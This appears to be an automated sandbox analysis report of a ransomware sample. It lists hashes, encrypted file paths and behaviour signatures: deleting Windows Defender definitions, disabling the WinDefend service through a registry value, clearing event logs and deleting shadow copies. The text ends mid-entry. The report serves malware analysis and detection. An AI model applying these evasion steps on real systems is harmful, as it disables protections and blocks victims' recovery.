Analysis
-
max time kernel
50s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-01-2022 16:44
Static task
static1
Behavioral task
behavioral1
Sample
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
-
Size
2.5MB
-
MD5
581d017db261422b60eed963c7823566
-
SHA1
6f35892e195de2c569c415a245a3302056bbfa08
-
SHA256
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc
-
SHA512
c6142d6478d9a02d0269d3121143a64cb7e0a41d35e7924c9ecf7ced739133d847c4aafb9b851e2a9321a054ba3b9c40f00d8e430ad5d19af271ea28fab214f1
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1852 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Program Files directory 64 IoCs
Processes:
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exedescription ioc process File opened for modification C:\Program Files\7-Zip\Lang\sk.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_QmspYuG7Byw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\.lastModified.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_3C212I7CBK40.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_CPyXVFY5Pik0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Ba8lWb03vhw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7ES.LEX.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_N6u5fKWsb3U0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\SATIN.ELM.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_aZCB-I6oalQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_pImch74ef8E0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_kOk2jyfpybI0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.White.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_WZXP1n9ZEb00.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_zgARkwTO-bw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_X5MLfLlFXIM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_oUK2E2hv1Vs0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_WNlTk7D1pXE0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_XmEgC8bpu7k0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_9CG2zFqQVro0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_VG62s1phjxM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_H9C8yBfwHB80.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_-hOLDxEIZV00.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_7Gx88OuUQqE0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ALINXfMDRlY0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ELQ-aUqS1Bg0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial3-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_pc0jXXDtiro0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmticmlr.h.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_UebgeXh69sY0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_h0lpPLemYIQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_44yL7ndjMz40.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime2019_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_X7AwMIxi4mw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\PREVIEW.GIF.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_4lyZ98RYmNk0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_qZ2axiECZPY0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\resources.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_NSEyg4DibWE0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_qRFzL7LNoBQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_LkcXR5peBRM0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.wordmui.msi.16.en-us.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_g1wOJ8DO-fY0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Y5ag8w5zjP00.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_1LCaHKBTY600.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\et-EE\tipresx.dll.mui 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_A0Erb8A57dE0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_KsOwxpR6ynY0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_gqzlWCWiiHQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_AoNNcuCuRmw0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_i7TT44knjxQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN121.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_MoOPI_F5g6s0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ar-SA\tipresx.dll.mui 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_e4oJWUexRvI0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Go6WgLDhXWQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_YbU6FIgJDYQ0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_wO-aJxziRF40.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_0FPCyxax_WU0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_T-xEsP_e4bc0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ypk6w6mIS6A0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_VJqbfBphG_E0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\PREVIEW.GIF.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_HXcAW1WZiMs0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_JoK5A66GBzc0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ko-KR\tipresx.dll.mui 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_y4EJt4qr44I0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_XRpuTVkiato0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-180.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_k7PZdeQ--VU0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Zi6BcsKTk3A0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_HoNihofGX3c0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_9UPbXtGxybA0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp4-ul-phn.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_RlDjZpa5JP40.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Erp_za8zDF80.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_v36NTEEFSS80.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial2-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_TDjqkQ-7mZA0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_zvIbj6ipyFU0.pruhs 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3500 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exepid process 3564 powershell.exe 3564 powershell.exe 3564 powershell.exe 752 powershell.exe 752 powershell.exe 752 powershell.exe 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 2716 wevtutil.exe Token: SeBackupPrivilege 2716 wevtutil.exe Token: SeSecurityPrivilege 3164 wevtutil.exe Token: SeBackupPrivilege 3164 wevtutil.exe Token: SeSecurityPrivilege 1616 wevtutil.exe Token: SeBackupPrivilege 1616 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1764 wmic.exe Token: SeSecurityPrivilege 1764 wmic.exe Token: SeTakeOwnershipPrivilege 1764 wmic.exe Token: SeLoadDriverPrivilege 1764 wmic.exe Token: SeSystemProfilePrivilege 1764 wmic.exe Token: SeSystemtimePrivilege 1764 wmic.exe Token: SeProfSingleProcessPrivilege 1764 wmic.exe Token: SeIncBasePriorityPrivilege 1764 wmic.exe Token: SeCreatePagefilePrivilege 1764 wmic.exe Token: SeBackupPrivilege 1764 wmic.exe Token: SeRestorePrivilege 1764 wmic.exe Token: SeShutdownPrivilege 1764 wmic.exe Token: SeDebugPrivilege 1764 wmic.exe Token: SeSystemEnvironmentPrivilege 1764 wmic.exe Token: SeRemoteShutdownPrivilege 1764 wmic.exe Token: SeUndockPrivilege 1764 wmic.exe Token: SeManageVolumePrivilege 1764 wmic.exe Token: 33 1764 wmic.exe Token: 34 1764 wmic.exe Token: 35 1764 wmic.exe Token: 36 1764 wmic.exe Token: SeIncreaseQuotaPrivilege 3104 wmic.exe Token: SeSecurityPrivilege 3104 wmic.exe Token: SeTakeOwnershipPrivilege 3104 wmic.exe Token: SeLoadDriverPrivilege 3104 wmic.exe Token: SeSystemProfilePrivilege 3104 wmic.exe Token: SeSystemtimePrivilege 3104 wmic.exe Token: SeProfSingleProcessPrivilege 3104 wmic.exe Token: SeIncBasePriorityPrivilege 3104 wmic.exe Token: SeCreatePagefilePrivilege 3104 wmic.exe Token: SeBackupPrivilege 3104 wmic.exe Token: SeRestorePrivilege 3104 wmic.exe Token: SeShutdownPrivilege 3104 wmic.exe Token: SeDebugPrivilege 3104 wmic.exe Token: SeSystemEnvironmentPrivilege 3104 wmic.exe Token: SeRemoteShutdownPrivilege 3104 wmic.exe Token: SeUndockPrivilege 3104 wmic.exe Token: SeManageVolumePrivilege 3104 wmic.exe Token: 33 3104 wmic.exe Token: 34 3104 wmic.exe Token: 35 3104 wmic.exe Token: 36 3104 wmic.exe Token: SeIncreaseQuotaPrivilege 3104 wmic.exe Token: SeSecurityPrivilege 3104 wmic.exe Token: SeTakeOwnershipPrivilege 3104 wmic.exe Token: SeLoadDriverPrivilege 3104 wmic.exe Token: SeSystemProfilePrivilege 3104 wmic.exe Token: SeSystemtimePrivilege 3104 wmic.exe Token: SeProfSingleProcessPrivilege 3104 wmic.exe Token: SeIncBasePriorityPrivilege 3104 wmic.exe Token: SeCreatePagefilePrivilege 3104 wmic.exe Token: SeBackupPrivilege 3104 wmic.exe Token: SeRestorePrivilege 3104 wmic.exe Token: SeShutdownPrivilege 3104 wmic.exe Token: SeDebugPrivilege 3104 wmic.exe Token: SeSystemEnvironmentPrivilege 3104 wmic.exe Token: SeRemoteShutdownPrivilege 3104 wmic.exe Token: SeUndockPrivilege 3104 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3484 wrote to memory of 908 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 908 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 908 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 908 wrote to memory of 980 908 net.exe net1.exe PID 908 wrote to memory of 980 908 net.exe net1.exe PID 908 wrote to memory of 980 908 net.exe net1.exe PID 3484 wrote to memory of 2292 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 2292 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 2292 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 2292 wrote to memory of 540 2292 net.exe net1.exe PID 2292 wrote to memory of 540 2292 net.exe net1.exe PID 2292 wrote to memory of 540 2292 net.exe net1.exe PID 3484 wrote to memory of 684 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 684 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 684 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 684 wrote to memory of 3184 684 net.exe net1.exe PID 684 wrote to memory of 3184 684 net.exe net1.exe PID 684 wrote to memory of 3184 684 net.exe net1.exe PID 3484 wrote to memory of 3680 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 3680 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 3680 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3680 wrote to memory of 3576 3680 net.exe net1.exe PID 3680 wrote to memory of 3576 3680 net.exe net1.exe PID 3680 wrote to memory of 3576 3680 net.exe net1.exe PID 3484 wrote to memory of 3636 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 3636 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 3636 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3636 wrote to memory of 2924 3636 net.exe net1.exe PID 3636 wrote to memory of 2924 3636 net.exe net1.exe PID 3636 wrote to memory of 2924 3636 net.exe net1.exe PID 3484 wrote to memory of 2764 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 2764 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 2764 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 2764 wrote to memory of 1408 2764 net.exe net1.exe PID 2764 wrote to memory of 1408 2764 net.exe net1.exe PID 2764 wrote to memory of 1408 2764 net.exe net1.exe PID 3484 wrote to memory of 2596 3484 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe net.exe PID 3484 wrote to memory of 